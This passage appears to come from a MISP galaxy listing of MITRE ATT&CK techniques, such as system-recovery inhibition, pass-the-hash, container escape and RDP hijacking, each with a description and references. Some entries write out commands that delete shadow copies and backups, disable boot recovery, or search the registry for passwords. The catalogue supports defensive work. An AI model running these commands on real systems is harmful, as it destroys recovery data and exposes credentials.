Adversaries may use a compromised device as a proxy server to the Internet. By utilizing a proxy, adversaries hide the true IP address of their C2 server and associated infrastructure from the destination of the network traffic. This masquerades an adversary’s traffic as legitimate traffic originating from the compromised device, which can evade IP-based restrictions and alerts on certain services, such as bank accounts and social media websites.(Citation: Threat Fabric Exobot)

The most common type of proxy is a SOCKS proxy. It can typically be implemented using standard OS-level APIs and 3rd party libraries with no indication to the user. On Android, adversaries can use the Proxy API to programmatically establish a SOCKS proxy connection, or lower-level APIs to interact directly with raw sockets.

The tag is: misp-galaxy:mitre-attack-pattern="Proxy Through Victim - T1604"

Table 5823. Table References

Links

https://attack.mitre.org/techniques/T1604

https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html

Windows Management Instrumentation - T1047

Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) (WinRM).(Citation: MSDN WMI) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: MSDN WMI)(Citation: FireEye WMI 2015)

An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)

The tag is: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047"

Table 5824. Table References

Links

https://attack.mitre.org/techniques/T1047

https://msdn.microsoft.com/en-us/library/aa394582.aspx

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf

Stored Application Data - T1409

Adversaries may try to access and collect application data resident on the device. Adversaries often target popular applications, such as Facebook, WeChat, and Gmail.(Citation: SWB Exodus March 2019)

Due to mobile OS sandboxing, this technique is only possible in three scenarios:

  • An application stores files in unprotected external storage

  • An application stores files in its internal storage directory with insecure permissions (e.g. 777)

  • The adversary gains root permissions on the device

The tag is: misp-galaxy:mitre-attack-pattern="Stored Application Data - T1409"

Table 5825. Table References

Links

https://attack.mitre.org/techniques/T1409

https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-0.html

https://securitywithoutborders.org/blog/2019/03/29/exodus.html

Inhibit System Recovery - T1490

Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.

Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Furthermore, adversaries may disable recovery notifications, then corrupt backups.(Citation: disable_notif_synology_ransom)

A number of native Windows utilities have been used by adversaries to disable or delete system recovery features:

  • <code>vssadmin.exe</code> can be used to delete all volume shadow copies on a system - <code>vssadmin.exe delete shadows /all /quiet</code>

  • [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - <code>wmic shadowcopy delete</code>

  • <code>wbadmin.exe</code> can be used to delete the Windows Backup Catalog - <code>wbadmin.exe delete catalog -quiet</code>

  • <code>bcdedit.exe</code> can be used to disable automatic Windows recovery features by modifying boot configuration data - <code>bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no</code>

  • <code>REAgentC.exe</code> can be used to disable Windows Recovery Environment (WinRE) repair/recovery options of an infected system

On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.

Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)

The tag is: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490"

Table 5826. Table References

Links

https://attack.mitre.org/techniques/T1490

https://blog.talosintelligence.com/2018/02/olympic-destroyer.html

https://rhinosecuritylabs.com/aws/s3-ransomware-part-2-prevention-and-defense/

https://twitter.com/TheDFIRReport/status/1498657590259109894

https://www.darkreading.com/attacks-breaches/code-hosting-service-shuts-down-after-cyber-attack

https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html

https://www.zdnet.com/article/ransomware-victims-thought-their-backups-were-safe-they-were-wrong/

Server Software Component - T1505

Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications.(Citation: volexity_0day_sophos_FW)

The tag is: misp-galaxy:mitre-attack-pattern="Server Software Component - T1505"

Table 5827. Table References

Links

https://attack.mitre.org/techniques/T1505

https://www.us-cert.gov/ncas/alerts/TA15-314A

https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/

Archive Collected Data - T1560

An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.

Both compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.

The tag is: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560"

Table 5828. Table References

Links

https://attack.mitre.org/techniques/T1560

https://en.wikipedia.org/wiki/List_of_file_signatures

Web Session Cookie - T1506

Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)

Authentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539), the adversary then imports the cookie into a browser they control and is able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform.

There have been examples of malware targeting session cookies to bypass multi-factor authentication systems.(Citation: Unit 42 Mac Crypto Cookies January 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Web Session Cookie - T1506"

Table 5829. Table References

Links

https://attack.mitre.org/techniques/T1506

https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/

https://wunderwuzzi23.github.io/blog/passthecookie.html

Uncommonly Used Port - T1065

Adversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls that have been improperly configured.

The tag is: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065"

Table 5830. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1065

Network Information Discovery - T1507

Adversaries may use device sensors to collect information about nearby networks, such as Wi-Fi and Bluetooth.

The tag is: misp-galaxy:mitre-attack-pattern="Network Information Discovery - T1507"

Table 5831. Table References

Links

https://attack.mitre.org/techniques/T1507

Pass the Hash - T1075

Pass the hash (PtH) is a method of authenticating as a user without having access to the user’s cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. In this technique, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.

Windows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes. (Citation: NSA Spotting)

The tag is: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1075"

Table 5832. Table References

Links

https://apps.nsa.gov/iaarchive/library/reports/spotting-the-adversary-with-windows-event-log-monitoring.cfm

https://attack.mitre.org/techniques/T1075

https://capec.mitre.org/data/definitions/644.html

Lateral Tool Transfer - T1570

Adversaries may transfer tools or other files between systems in a compromised environment. Once brought into the victim environment (i.e., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) files may then be copied from one system to another to stage adversary tools or other files over the course of an operation.

Adversaries may copy files between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) to connected network shares or with authenticated connections via [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001).(Citation: Unit42 LockerGoga 2019)

Files can also be transferred using native or otherwise present tools on the victim system, such as scp, rsync, curl, sftp, and [ftp](https://attack.mitre.org/software/S0095). In some cases, adversaries may be able to leverage [Web Service](https://attack.mitre.org/techniques/T1102)s such as Dropbox or OneDrive to copy files from one machine to another via shared, automatically synced folders.(Citation: Dropbox Malware Sync)

The tag is: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570"

Table 5833. Table References

Links

https://attack.mitre.org/techniques/T1570

https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/

https://www.technologyreview.com/2013/08/21/83143/dropbox-and-similar-services-can-sync-malware/

Suppress Application Icon - T1508

A malicious application could suppress its icon from being displayed to the user in the application launcher to hide the fact that it is installed, and to make it more difficult for the user to uninstall the application. Hiding the application’s icon programmatically does not require any special permissions.

This behavior has been seen in the BankBot/Spy Banker family of malware.(Citation: android-trojan-steals-paypal-2fa)(Citation: sunny-stolen-credentials)(Citation: bankbot-spybanker)

The tag is: misp-galaxy:mitre-attack-pattern="Suppress Application Icon - T1508"

Table 5834. Table References

Links

https://attack.mitre.org/techniques/T1508

https://www.cyber.nj.gov/threat-profiles/android-malware-variants/bankbot-spybanker

https://www.welivesecurity.com/2017/02/22/sunny-chance-stolen-credentials-malicious-weather-app-found-google-play/

https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/

Cloud Infrastructure Discovery - T1580

An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.

Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a <code>DescribeInstances</code> API within the Amazon EC2 API that can return information about one or more instances within an account, the <code>ListBuckets</code> API that returns a list of all buckets owned by the authenticated sender of the request, the <code>HeadBucket</code> API to determine a bucket’s existence along with access permissions of the request sender, or the <code>GetPublicAccessBlock</code> API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP’s Cloud SDK CLI provides the <code>gcloud compute instances list</code> command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure’s CLI command <code>az vm list</code> lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)

An adversary may enumerate resources using a compromised user’s access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020) An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries may also use infrastructure discovery APIs such as <code>DescribeDBInstances</code> to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.

The tag is: misp-galaxy:mitre-attack-pattern="Cloud Infrastructure Discovery - T1580"

Table 5835. Table References

Links

https://attack.mitre.org/techniques/T1580

https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/

https://cloud.google.com/sdk/gcloud/reference/compute/instances/list

https://content.fireeye.com/m-trends/rpt-m-trends-2020

https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html

https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html

https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html

https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html

https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html

https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest

https://expel.io/blog/finding-evil-in-aws/

Forge Web Credentials - T1606

Adversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies, tokens, or other materials to authenticate and authorize user access.

Adversaries may generate these credential materials in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539), [Steal Application Access Token](https://attack.mitre.org/techniques/T1528), and other similar behaviors in that the credentials are new and forged by the adversary, rather than stolen or intercepted from legitimate users.

The generation of web credentials often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values.(Citation: GitHub AWS-ADFS-Credential-Generator) Adversaries may also forge tokens by taking advantage of features such as the AssumeRole and GetFederationToken APIs in AWS, which allow users to request temporary security credentials (i.e., [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005)), or the zmprov gdpak command in Zimbra, which generates a pre-authentication key that can be used to generate tokens for any user in the domain.(Citation: AWS Temporary Security Credentials)(Citation: Zimbra Preauth)

Once forged, adversaries may use these web credentials to access resources (ex: [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)(Citation: Microsoft SolarWinds Customer Guidance)

The tag is: misp-galaxy:mitre-attack-pattern="Forge Web Credentials - T1606"

Table 5836. Table References

Links

https://attack.mitre.org/techniques/T1606

https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp_request.html

https://github.com/damianh/aws-adfs-credential-generator

https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/

https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/

https://wiki.zimbra.com/wiki/Preauth

https://wunderwuzzi23.github.io/blog/passthecookie.html

Remote Desktop Protocol - T1076

Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). (Citation: TechNet Remote Desktop Services) There are other implementations and third-party tools that provide graphical access [Remote Services](https://attack.mitre.org/techniques/T1021) similar to RDS.

Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1015) technique for Persistence. (Citation: Alperovitch Malware)

Adversaries may also perform RDP session hijacking which involves stealing a legitimate user’s remote session. Typically, a user is notified when someone else is trying to steal their session and prompted with a question. With System permissions and using Terminal Services Console, <code>c:\windows\system32\tscon.exe [session number to be stolen]</code>, an adversary can hijack a session without the need for credentials or prompts to the user. (Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions. (Citation: RDP Hijacking Medium) It can also lead to [Remote System Discovery](https://attack.mitre.org/techniques/T1018) and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in RedSnarf. (Citation: Kali Redsnarf)

The tag is: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1076"

Table 5837. Table References

Links

http://blog.crowdstrike.com/adversary-tricks-crowdstrike-treats/

http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html

https://attack.mitre.org/techniques/T1076

https://capec.mitre.org/data/definitions/555.html

https://github.com/nccgroup/redsnarf

https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6

https://technet.microsoft.com/en-us/windowsserver/ee236407.aspx

Container Administration Command - T1609

Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)

In Docker, adversaries may specify an entrypoint during container deployment that executes a script or command, or they may use a command such as <code>docker exec</code> to execute a command within a running container.(Citation: Docker Entrypoint)(Citation: Docker Exec) In Kubernetes, if an adversary has sufficient permissions, they may gain remote execution in a container in the cluster via interaction with the Kubernetes API server, the kubelet, or by running a command such as <code>kubectl exec</code>.(Citation: Kubectl Exec Get Shell)

The tag is: misp-galaxy:mitre-attack-pattern="Container Administration Command - T1609"

Table 5838. Table References

Links

https://attack.mitre.org/techniques/T1609

https://docs.docker.com/engine/reference/commandline/dockerd/

https://docs.docker.com/engine/reference/commandline/exec/

https://docs.docker.com/engine/reference/run/#entrypoint-default-command-to-execute-at-runtime

https://kubernetes.io/docs/concepts/overview/kubernetes-api/

https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/

https://kubernetes.io/docs/tasks/debug-application-cluster/get-shell-running-container/

NTFS File Attributes - T1096

Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)

Adversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015)

The tag is: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1096"

Table 5839. Table References

Links

http://journeyintoir.blogspot.com/2012/12/extracting-zeroaccess-from-ntfs.html

http://msdn.microsoft.com/en-us/library/aa364404

https://attack.mitre.org/techniques/T1096

https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/

https://blogs.technet.microsoft.com/askcore/2010/08/25/ntfs-file-attributes/

https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/

https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/

https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/

https://posts.specterops.io/host-based-threat-modeling-indicator-design-a9dbbb53d5ea

https://www.symantec.com/connect/articles/what-you-need-know-about-alternate-data-streams-windows-your-data-secure-can-you-restore

Permission Groups Discovery - T1069

Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.

Adversaries may attempt to discover group permission settings in many different ways. This data may provide the adversary with information about the compromised environment that can be used in follow-on activity and targeting.(Citation: CrowdStrike BloodHound April 2018)

The tag is: misp-galaxy:mitre-attack-pattern="Permission Groups Discovery - T1069"

Table 5840. Table References

Links

https://attack.mitre.org/techniques/T1069

https://kubernetes.io/docs/reference/access-authn-authz/authorization/

https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/

Windows Admin Shares - T1077

Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include <code>C$</code>, <code>ADMIN$</code>, and <code>IPC$</code>.

Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over server message block (SMB) (Citation: Wikipedia SMB) to interact with systems using remote procedure calls (RPCs), (Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1035), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1075) and certain configuration and patch levels. (Citation: Microsoft Admin Shares)

The [Net](https://attack.mitre.org/software/S0039) utility can be used to connect to Windows admin shares on remote systems using <code>net use</code> commands with valid credentials. (Citation: Technet Net Use)

The tag is: misp-galaxy:mitre-attack-pattern="Windows Admin Shares - T1077"

Table 5841. Table References

Links

http://support.microsoft.com/kb/314984

https://attack.mitre.org/techniques/T1077

https://capec.mitre.org/data/definitions/561.html

https://docs.microsoft.com/en-us/archive/blogs/jepayne/monitoring-what-matters-windows-event-forwarding-for-everyone-even-if-you-already-have-a-siem

https://docs.microsoft.com/en-us/archive/blogs/jepayne/tracking-lateral-movement-part-one-special-groups-and-specific-service-accounts

https://en.wikipedia.org/wiki/Server_Message_Block

https://medium.com/threatpunter/detecting-lateral-movement-using-sysmon-and-splunk-318d3be141bc

https://technet.microsoft.com/bb490717.aspx

https://technet.microsoft.com/en-us/library/cc787851.aspx

Pass the Ticket - T1097

Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account’s password. Kerberos authentication can be used as the first step to lateral movement to a remote system.

In this technique, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). A user’s service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access. (Citation: ADSecurity AD Kerberos Attacks) (Citation: GentilKiwi Pass the Ticket)

Silver Tickets can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint). (Citation: ADSecurity AD Kerberos Attacks)

Golden Tickets can be obtained for the domain using the NTLM hash of the Key Distribution Service account (KRBTGT), which enables generation of TGTs for any account in Active Directory. (Citation: Campbell 2014)

The tag is: misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1097"

Table 5842. Table References

Links

http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos

http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf

https://adsecurity.org/?p=556

https://attack.mitre.org/techniques/T1097

https://capec.mitre.org/data/definitions/645.html

https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf

Disabling Security Tools - T1089

Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security scanning or event reporting.

The tag is: misp-galaxy:mitre-attack-pattern="Disabling Security Tools - T1089"

Table 5843. Table References

Links

https://attack.mitre.org/techniques/T1089

https://capec.mitre.org/data/definitions/578.html

Space after Filename - T1151

Adversaries can hide a program’s true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system. For example, if there is a Mach-O executable file called evil.bin, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to evil.txt, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to "evil.txt " (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed (Citation: Mac Backdoors are back).

Adversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.

The tag is: misp-galaxy:mitre-attack-pattern="Space after Filename - T1151"

Table 5844. Table References

Links

https://arstechnica.com/security/2016/07/after-hiatus-in-the-wild-mac-backdoors-are-suddenly-back/

https://attack.mitre.org/techniques/T1151

https://capec.mitre.org/data/definitions/649.html

Escape to Host - T1611

Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview)

There are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host; utilizing a privileged container to run commands or load a malicious kernel module on the underlying host; or abusing system calls such as unshare and keyctl to escalate privileges and steal secrets.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20)(Citation: Container Escape)(Citation: Crowdstrike Kubernetes Container Escape)(Citation: Keyctl-unmask)

Additionally, an adversary may be able to exploit a compromised container with a mounted container management socket, such as docker.sock, to break out of the container via a [Container Administration Command](https://attack.mitre.org/techniques/T1609).(Citation: Container Escape) Adversaries may also escape via [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.(Citation: Windows Server Containers Are Open)

Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host.

The tag is: misp-galaxy:mitre-attack-pattern="Escape to Host - T1611"

Table 5845. Table References

Links

https://0xn3va.gitbook.io/cheat-sheets/container/escaping

https://attack.mitre.org/techniques/T1611

https://docs.docker.com/get-started/overview/

https://docs.docker.com/storage/bind-mounts/

https://unit42.paloaltonetworks.com/windows-server-containers-vulnerabilities/

https://www.antitree.com/2020/07/keyctl-unmask-going-florida-on-the-state-of-containerizing-linux-keyrings/

https://www.crowdstrike.com/blog/cve-2022-0185-kubernetes-container-escape-using-linux-kernel-exploit/

https://www.intezer.com/blog/cloud-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/

https://www.trendmicro.com/en_us/research/19/l/why-running-a-privileged-container-in-docker-is-a-bad-idea.html

Create strategic plan - T1231

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1231).

Strategic plans outline the mission, vision, and goals for an adversary at a high level in relation to the key partners, topics, and functions the adversary carries out. (Citation: KPMGChina5Year) (Citation: China5YearPlans) (Citation: ChinaUN)

The tag is: misp-galaxy:mitre-attack-pattern="Create strategic plan - T1231"

Table 5846. Table References

Links

https://attack.mitre.org/techniques/T1231

Capture SMS Messages - T1412

A malicious application could capture sensitive data sent via SMS, including authentication credentials. SMS is frequently used to transmit codes used for multi-factor authentication.

On Android, a malicious application must request and obtain permission (either at app install time or run time) in order to receive SMS messages. Alternatively, a malicious application could attempt to perform an operating system privilege escalation attack to bypass the permission requirement.

On iOS, applications cannot access SMS messages in normal operation, so an adversary would need to attempt to perform an operating system privilege escalation attack to potentially be able to access SMS messages.

The tag is: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412"

Table 5847. Table References

Links

https://attack.mitre.org/techniques/T1412

Credentials in Registry - T1214

The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.

Example commands to find Registry keys related to password information: (Citation: Pentestlab Stored Credentials)

  • Local Machine Hive: <code>reg query HKLM /f password /t REG_SZ /s</code>

  • Current User Hive: <code>reg query HKCU /f password /t REG_SZ /s</code>

The tag is: misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1214"

Table 5848. Table References

Links

https://attack.mitre.org/techniques/T1214

https://pentestlab.blog/2017/04/19/stored-credentials/

System Time Discovery - T1124

An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time)(Citation: Technet Windows Time Service)

System time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing <code>net time \\hostname</code> to gather the system time on a remote system. The victim’s time zone may also be inferred from the current system time or gathered by using <code>w32tm /tz</code>.(Citation: Technet Windows Time Service)

On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as <code>show clock detail</code> can be used to see the current time configuration.(Citation: show_clock_detail_cisco_cmd)

This information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)(Citation: RSA EU12 They’re Inside), or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.(Citation: AnyRun TimeBomb)

The tag is: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124"

Table 5849. Table References

Links

https://any.run/cybersecurity-blog/time-bombs-malware-with-delayed-execution/

https://attack.mitre.org/techniques/T1124

https://msdn.microsoft.com/ms724961.aspx

https://technet.microsoft.com/windows-server-docs/identity/ad-ds/get-started/windows-time-service/windows-time-service-tools-and-settings

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-s2.html#wp1896741674

https://www.rsaconference.com/writable/presentations/file_upload/ht-209_rivner_schwartz.pdf

Determine strategic target - T1241

